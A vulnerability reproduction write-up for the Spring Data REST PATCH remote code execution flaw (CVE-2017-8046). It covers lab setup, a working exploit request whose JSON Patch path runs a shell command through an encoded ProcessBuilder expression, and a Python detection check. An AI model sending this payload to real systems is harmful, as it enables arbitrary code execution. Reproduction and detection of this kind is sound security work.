Attackers can submit malicious PATCH requests with carefully constructed JSON data to a Spring Data REST service to execute arbitrary Java code.
1. Background
Spring Data REST is part of the Spring Data project and makes it easy to build hypermedia-driven REST web services on top of Spring Data repositories.
2. Scope of impact
Spring Data REST versions prior to 2.5.12, 2.6.7 and 3.0 RC3 are affected. To determine the Spring Data REST version in use, check the version of the spring-data-rest-webmvc jar package.
3. Reproducing the vulnerability locally
Maven installation
cd /opt
wget http://apache.mirror.gtcomm.net/maven/maven-3/3.5.0/binaries/apache-maven-3.5.0-bin.zip
unzip apache-maven-3.5.0-bin.zip
# in ~/.bash_profile: PATH=/opt/apache-maven-3.5.0/bin:$PATH
mvn -v
Start the Web service
wget https://github.com/spring-projects/spring-data-examples/archive/master.zip
unzip master.zip
cd spring-data-examples-master/rest/multi-store
mvn spring-boot:run
Add data
curl -X POST -H "Content-Type: application/json" -d '{"firstName": "Greg", "lastName": "Turnquist"}' http://localhost:8080/persons
Remote Code Execution
The request method is PATCH and the Content-Type is application/json-patch+json.
The byte values in the payload below encode the command; they can be generated in Python:
",".join(map(str, (map(ord, "whoami > /tmp/pwn.txt"))))
PATCH /persons/1 HTTP/1.1
Host: 192.168.1.108:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 325

[{ "op": "replace", "path": "(new java.lang.ProcessBuilder(new java.lang.String(new byte[]{47,117,115,114,47,98,105,110,47,98,97,115,104}), new java.lang.String(new byte[]{45,99}), new java.lang.String(new byte[]{119,104,111,97,109,105,32,62,32,47,116,109,112,47,112,119,110,46,116,120,116}))).start().x", "value": "Zhang" }]
The /tmp/pwn.txt file is generated.
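
On the detection side, the request above stands out because a JSON Patch "path" is defined (RFC 6902) as a JSON Pointer, which is either empty or a sequence of "/"-prefixed segments. The following is an added example, not part of the original write-up or of Spring Data REST: a check for a proxy or log pipeline that flags PATCH bodies whose pointers fail a strict allowlist. The function names and the segment allowlist are assumptions, and the check complements upgrading past the versions listed in section 2.

```python
import json
import re

# Allowlist for one pointer segment: bean-style property name, array index,
# or "-" (append). Deliberately stricter than RFC 6901 (assumption).
TOKEN = re.compile(r"[A-Za-z_][A-Za-z0-9_]*|0|[1-9][0-9]*|-")
PATCH_TYPE = "application/json-patch+json"


def is_plain_pointer(pointer):
    """True for "" (whole document) or "/seg/seg..." built only from allowlisted segments."""
    if pointer == "":
        return True
    if not pointer.startswith("/"):
        return False
    return all(TOKEN.fullmatch(seg) for seg in pointer[1:].split("/"))


def suspicious_paths(body):
    """Return the "path"/"from" values of a JSON Patch body that fail the allowlist."""
    try:
        ops = json.loads(body)
    except ValueError:
        return ["<unparseable body>"]
    if not isinstance(ops, list):
        return ["<body is not a JSON array>"]
    bad = []
    for op in ops:
        if not isinstance(op, dict):
            bad.append("<operation is not an object>")
            continue
        for key in ("path", "from"):
            value = op.get(key, "")
            if not isinstance(value, str) or not is_plain_pointer(value):
                bad.append(str(value))
    return bad


def should_flag(method, content_type, body):
    """Flag PATCH requests of type application/json-patch+json with non-pointer paths."""
    media_type = content_type.split(";")[0].strip().lower()
    if method.upper() != "PATCH" or media_type != PATCH_TYPE:
        return False
    return bool(suspicious_paths(body))


# Constructed samples: a benign patch, and one shaped like the request above
# with the expression arguments elided so it is inert.
BENIGN = '[{"op": "replace", "path": "/lastName", "value": "Zhang"}]'
CRAFTED = ('[{"op": "replace", "path": '
           '"(new java.lang.ProcessBuilder(...)).start().x", "value": "Zhang"}]')
```
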
4. Reference
https://mp.weixin.qq.com/s/uTiWDsPKEjTkN6z9QNLtSA
https://github.com/spring-projects/spring-data-examples/tree/master/rest/multi-store
Spring Data REST PATCH request remote code execution vulnerability case (CVE-2017-8046)